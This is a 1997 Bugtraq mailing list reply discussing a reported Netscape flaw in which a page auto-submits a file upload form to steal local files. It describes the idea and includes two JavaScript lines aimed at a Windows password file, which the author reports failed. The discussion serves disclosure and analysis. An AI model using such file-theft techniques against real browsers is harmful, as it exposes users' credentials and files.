Bugtraq mailing list archives
Re: Netscape Exploit... with technical details.
From: phear () OUTLAWLABS COM NO SPAM (Phear)
Date: Sat, 14 Jun 1997 13:14:38 -0700
Edwin Li-Kai Liu wrote:
Rusty Conover wrote:In my method JavaScript would have to be used to automaticallysubmita HTML Form to the server. In these forms a page writer could have already coded the file name into the source document, such as "autoexec.bat". When the browser loads the page off of the server,itsubmits the form which transmits the file to the server via the HTTP-File upload procedure. The SERVER now has the file the author wanted. To fool the user, the CGI program sends the location of thereal web page to the client, and the client doesn't know otherwise. This method would require the files to be small or else the userwillnotice this is taking a long time to load the page over a modem.Butthe potential for this exploit to be used over faster transmission lines is greater. To have a solution to this problem would be a warning dialog box, telling the user that they are transmitting a file not just aregularHTTP form. I have not written a single line of code exploiting thispotential vulnerability, I might get around to it if I have time. Please note: I sent this original message 1 day (June 12) before toNetscape and now they confirm that my hypothesis was correct on the URL: http://home.netscape.com/misc/security_update.htmlYes, this is absolutely correct. You have proved my points also. Please see my message on netscape.security newsgroup, titled "Re: Security BUG". I have then post the same message to other newsgroups one day after, which is today. I want public to know the truth, instead of being panic. The following is the original message. <snip>
Well, I would be MORE than excited to see some code for this. When I saw the story on CNN, I immediately went to work and tried to duplicate it. The only thing I could think of that would allow the retrieval of files was the <INPUT TYPE="File"> form element, which sends the file as ENCTYPE multipart/form-data. I wrote a little shell script to display everything that the form sent, and I wrote the web page, with three javascript functions. One to load up the File box with the filename, one to press the submit button, and a function to be called by the body onload event. It's a great idea, but I think Netscape has already thought of it because every attempt to load the file box programmatically resulted in a javascript error pointing out that the File input type was READ-ONLY. I even made it a textbox first, and then tried to change the type after loading the filename: document.form.textbox.value="c:\windows\someone.pwl" document.form.textbox.type="file" And it still doesn't work. So, while this seems to be the only place I can think of for the bug, all attempts at exploiting it have failed. Unless you can get around the read-only state of the file input box, I don't know how it can work. Anyway, my two cents.. phear
Current thread:
- Re: Netscape Exploit... with technical details. Edwin Li-Kai Liu (Jun 14)
- <Possible follow-ups>
- Re: Netscape Exploit... with technical details. Phear (Jun 14)